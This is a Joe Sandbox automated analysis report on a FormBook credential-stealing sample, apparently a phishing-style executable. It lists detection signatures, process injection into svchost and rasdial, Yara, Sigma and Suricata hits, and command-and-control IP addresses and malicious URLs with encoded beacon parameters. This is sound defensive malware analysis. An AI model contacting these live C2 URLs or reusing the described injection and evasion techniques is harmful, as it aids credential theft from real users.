Edit tour

Windows Analysis Report
rPO-20429124.exe

Overview

General Information

Sample name:	rPO-20429124.exe
Analysis ID:	1630602
MD5:	545b8143837fcf1f6de4c730b2297137
SHA1:	91e8fada7fcb8edbc9e20b445891c62c63d5ec45
SHA256:	fe6feeb4f0951e003ba5e3d621474b3870ca0a84d7c62bec2315a2978c20848e
Tags:	exeuser-Porcupine
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

Binary is likely a compiled AutoIt script file

Found direct / indirect Syscall (likely to bypass EDR)

Joe Sandbox ML detected suspicious sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious RASdial Activity

Sigma detected: Uncommon Svchost Parent Process

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

rPO-20429124.exe (PID: 2940 cmdline: "C:\Users\user\Desktop\rPO-20429124.exe" MD5: 545B8143837FCF1F6DE4C730B2297137)

svchost.exe (PID: 5972 cmdline: "C:\Users\user\Desktop\rPO-20429124.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)

ciwawa29wTdWR69xAi924.exe (PID: 2360 cmdline: "C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\BR7WxvVi.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

rasdial.exe (PID: 7088 cmdline: "C:\Windows\SysWOW64\rasdial.exe" MD5: A280B0F42A83064C41CFFDC1CD35136E)

ciwawa29wTdWR69xAi924.exe (PID: 3252 cmdline: "C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\LFLzPRlAcNMYd.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)

firefox.exe (PID: 3668 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000004.00000002.4529137724.0000000000F10000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2175914455.00000000080D0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4529171574.0000000000F60000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000006.00000002.4531314792.0000000005510000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000004.00000002.4527985230.0000000000A30000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2171988415.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000003.00000002.4529216494.0000000003A10000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000002.00000002.2172584139.00000000041E0000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Click to see the 3 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.svchost.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious RASdial Activity

Source: Process started

Author: juju4: Data: Command: "C:\Windows\SysWOW64\rasdial.exe", CommandLine: "C:\Windows\SysWOW64\rasdial.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rasdial.exe, NewProcessName: C:\Windows\SysWOW64\rasdial.exe, OriginalFileName: C:\Windows\SysWOW64\rasdial.exe, ParentCommandLine: "C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\BR7WxvVi.exe" , ParentImage: C:\Program Files (x86)\NvFlvWNYZmeVjNVESZcLBcaxLYFQiKCJDLHKebMYgClvtQNtyqODxvEvNiqDfeSkZjKOGqYtpHkOAXN\ciwawa29wTdWR69xAi924.exe, ParentProcessId: 2360, ParentProcessName: ciwawa29wTdWR69xAi924.exe, ProcessCommandLine: "C:\Windows\SysWOW64\rasdial.exe", ProcessId: 7088, ProcessName: rasdial.exe

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\rPO-20429124.exe", CommandLine: "C:\Users\user\Desktop\rPO-20429124.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO-20429124.exe", ParentImage: C:\Users\user\Desktop\rPO-20429124.exe, ParentProcessId: 2940, ParentProcessName: rPO-20429124.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPO-20429124.exe", ProcessId: 5972, ProcessName: svchost.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\Desktop\rPO-20429124.exe", CommandLine: "C:\Users\user\Desktop\rPO-20429124.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rPO-20429124.exe", ParentImage: C:\Users\user\Desktop\rPO-20429124.exe, ParentProcessId: 2940, ParentProcessName: rPO-20429124.exe, ProcessCommandLine: "C:\Users\user\Desktop\rPO-20429124.exe", ProcessId: 5972, ProcessName: svchost.exe

Suricata Signatures

ETPRO MALWARE FormBook CnC Checkin (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T04:01:41.694034+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49719	13.248.169.48	80	TCP
2025-03-06T04:02:25.385648+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49773	13.248.169.48	80	TCP
2025-03-06T04:02:46.894939+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49863	69.57.163.64	80	TCP
2025-03-06T04:03:00.836196+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49896	188.114.97.3	80	TCP
2025-03-06T04:03:14.625111+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49926	213.142.151.128	80	TCP
2025-03-06T04:03:27.957849+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49957	172.67.148.163	80	TCP
2025-03-06T04:03:42.308593+0100	2855465	1	A Network Trojan was detected	192.168.2.5	49988	47.83.1.90	80	TCP
2025-03-06T04:03:55.734356+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50002	63.250.38.223	80	TCP
2025-03-06T04:04:08.916575+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50006	3.33.130.190	80	TCP
2025-03-06T04:04:33.002377+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50010	13.248.169.48	80	TCP
2025-03-06T04:04:46.396620+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50014	52.20.84.62	80	TCP
2025-03-06T04:04:59.716021+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50018	13.248.169.48	80	TCP
2025-03-06T04:05:13.896253+0100	2855465	1	A Network Trojan was detected	192.168.2.5	50022	47.83.1.90	80	TCP

ETPRO MALWARE FormBook CnC Checkin (POST) M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-06T04:01:57.231735+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49755	13.248.169.48	80	TCP
2025-03-06T04:01:59.780053+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49761	13.248.169.48	80	TCP
2025-03-06T04:02:03.376829+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49767	13.248.169.48	80	TCP
2025-03-06T04:02:39.131381+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49845	69.57.163.64	80	TCP
2025-03-06T04:02:41.647383+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49851	69.57.163.64	80	TCP
2025-03-06T04:02:44.195250+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49857	69.57.163.64	80	TCP
2025-03-06T04:02:53.047360+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49874	188.114.97.3	80	TCP
2025-03-06T04:02:55.516120+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49880	188.114.97.3	80	TCP
2025-03-06T04:02:58.245336+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49888	188.114.97.3	80	TCP
2025-03-06T04:03:06.961737+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49908	213.142.151.128	80	TCP
2025-03-06T04:03:09.527717+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49914	213.142.151.128	80	TCP
2025-03-06T04:03:12.075223+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49920	213.142.151.128	80	TCP
2025-03-06T04:03:20.318297+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49938	172.67.148.163	80	TCP
2025-03-06T04:03:22.845814+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49944	172.67.148.163	80	TCP
2025-03-06T04:03:25.400094+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49950	172.67.148.163	80	TCP
2025-03-06T04:03:34.532935+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49970	47.83.1.90	80	TCP
2025-03-06T04:03:37.000279+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49976	47.83.1.90	80	TCP
2025-03-06T04:03:39.627606+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49982	47.83.1.90	80	TCP
2025-03-06T04:03:48.069234+0100	2855464	1	A Network Trojan was detected	192.168.2.5	49999	63.250.38.223	80	TCP
2025-03-06T04:03:50.645747+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50000	63.250.38.223	80	TCP
2025-03-06T04:03:53.181696+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50001	63.250.38.223	80	TCP
2025-03-06T04:04:01.266779+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50003	3.33.130.190	80	TCP
2025-03-06T04:04:03.815388+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50004	3.33.130.190	80	TCP
2025-03-06T04:04:06.347568+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50005	3.33.130.190	80	TCP
2025-03-06T04:04:14.426129+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50007	13.248.169.48	80	TCP
2025-03-06T04:04:16.984106+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50008	13.248.169.48	80	TCP
2025-03-06T04:04:20.440469+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50009	13.248.169.48	80	TCP
2025-03-06T04:04:38.682641+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50011	52.20.84.62	80	TCP
2025-03-06T04:04:41.243283+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50012	52.20.84.62	80	TCP
2025-03-06T04:04:43.800315+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50013	52.20.84.62	80	TCP
2025-03-06T04:04:52.892605+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50015	13.248.169.48	80	TCP
2025-03-06T04:04:54.499518+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50016	13.248.169.48	80	TCP
2025-03-06T04:04:57.966970+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50017	13.248.169.48	80	TCP
2025-03-06T04:05:06.267204+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50019	47.83.1.90	80	TCP
2025-03-06T04:05:08.793599+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50020	47.83.1.90	80	TCP
2025-03-06T04:05:11.361080+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50021	47.83.1.90	80	TCP
2025-03-06T04:05:19.626043+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50023	217.160.0.236	80	TCP
2025-03-06T04:05:22.180250+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50024	217.160.0.236	80	TCP
2025-03-06T04:05:25.174961+0100	2855464	1	A Network Trojan was detected	192.168.2.5	50025	217.160.0.236	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: rPO-20429124.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://www.blogkart4u.xyz/apzq/	Avira URL Cloud: Label: malware
Source: http://www.publicblockchain.xyz/ttj6/?cFo4qVPp=iF0RL9l91cg/r0ryQ96WkUNoN9S7LbfTbsX3VnFoQx5VcqP5rWYrT0esrSS4eYlVGZhUHSx68xLL+nijBbyUGaPQrCH+nQzWW8cftMGt0zfGb8RyPkZsnwIt7raPvb4guA==&n6z=yDXHTb8HD8B0FVmP	Avira URL Cloud: Label: malware
Source: http://www.blogkart4u.xyz/apzq/?cFo4qVPp=au1daHn9wgKf20+4s5dbudIXdZzi7fKeXAClWCeNG3Sywxkl0XeeTL4ILw5N/PIPOKD1smdtPeAjU/QWU0zFx78Kf7dkU7sR/csTYD8cQMq/1dAzL+BQp22ngcPrvFzIdw==&n6z=yDXHTb8HD8B0FVmP	Avira URL Cloud: Label: malware
Source: http://www.thisisnonft.studio	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: rPO-20429124.exe	Virustotal: Detection: 33%			Perma Link
Source: rPO-20429124.exe	ReversingLabs: Detection: 42%

Yara detected FormBook

Source: Yara match	File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.4529137724.0000000000F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2175914455.00000000080D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4529171574.0000000000F60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.4531314792.0000000005510000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4527985230.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2171988415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4529216494.0000000003A10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2172584139.00000000041E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: rPO-20429124.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: wntdll.pdbUGP source: rPO-20429124.exe, 00000000.00000003.2064548111.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, rPO-20429124.exe, 00000000.00000003.2065852917.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172254163.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172254163.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071576701.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2068873294.0000000003000000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4529458678.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4529458678.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000004.00000003.2172336594.0000000004789000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000003.2174636574.000000000493D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdb source: svchost.exe, 00000002.00000003.2140751258.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172158666.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000002.4528531691.000000000125E000.00000004.00000020.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000003.2110998909.0000000001275000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: rPO-20429124.exe, 00000000.00000003.2064548111.0000000003CA0000.00000004.00001000.00020000.00000000.sdmp, rPO-20429124.exe, 00000000.00000003.2065852917.0000000003E40000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2172254163.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172254163.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2071576701.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2068873294.0000000003000000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, rasdial.exe, 00000004.00000002.4529458678.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4529458678.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, rasdial.exe, 00000004.00000003.2172336594.0000000004789000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000003.2174636574.000000000493D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rasdial.pdbGCTL source: svchost.exe, 00000002.00000003.2140751258.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2172158666.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000002.4528531691.000000000125E000.00000004.00000020.00020000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000003.00000003.2110998909.0000000001275000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: rasdial.exe, 00000004.00000002.4528159843.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4530749885.000000000511C000.00000004.10000000.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2458009274.000000001255C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: rasdial.exe, 00000004.00000002.4528159843.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, rasdial.exe, 00000004.00000002.4530749885.000000000511C000.00000004.10000000.00040000.00000000.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000002.4529392890.00000000030DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2458009274.000000001255C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: ciwawa29wTdWR69xAi924.exe, 00000003.00000000.2093661884.00000000009EF000.00000002.00000001.01000000.00000004.sdmp, ciwawa29wTdWR69xAi924.exe, 00000006.00000000.2239526640.00000000009EF000.00000002.00000001.01000000.00000004.sdmp

Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019445A GetFileAttributesW,FindFirstFileW,FindClose,	0_2_0019445A
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019C6D1 FindFirstFileW,FindClose,	0_2_0019C6D1
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_0019C75C
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0019EF95
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_0019F0F2
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0019F3F3
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_001937EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_001937EF
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_00193B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00193B12
Source: C:\Users\user\Desktop\rPO-20429124.exe	Code function: 0_2_0019BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_0019BCBC
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4_2_00A4C6F0 FindFirstFileW,FindNextFileW,FindClose,	4_2_00A4C6F0

Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4x nop then xor eax, eax		4_2_00A39E40
Source: C:\Windows\SysWOW64\rasdial.exe	Code function: 4x nop then mov ebx, 00000004h		4_2_048304E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49755 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49761 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49719 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49767 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49773 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49845 -> 69.57.163.64:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49851 -> 69.57.163.64:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49863 -> 69.57.163.64:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49888 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49874 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49857 -> 69.57.163.64:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49926 -> 213.142.151.128:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49896 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49944 -> 172.67.148.163:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49950 -> 172.67.148.163:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49880 -> 188.114.97.3:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49908 -> 213.142.151.128:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49976 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50000 -> 63.250.38.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 63.250.38.223:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50008 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50012 -> 52.20.84.62:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49970 -> 47.83.1.90:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 52.20.84.62:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50014 -> 52.20.84.62:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 217.160.0.236:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 47.83.1.90:80
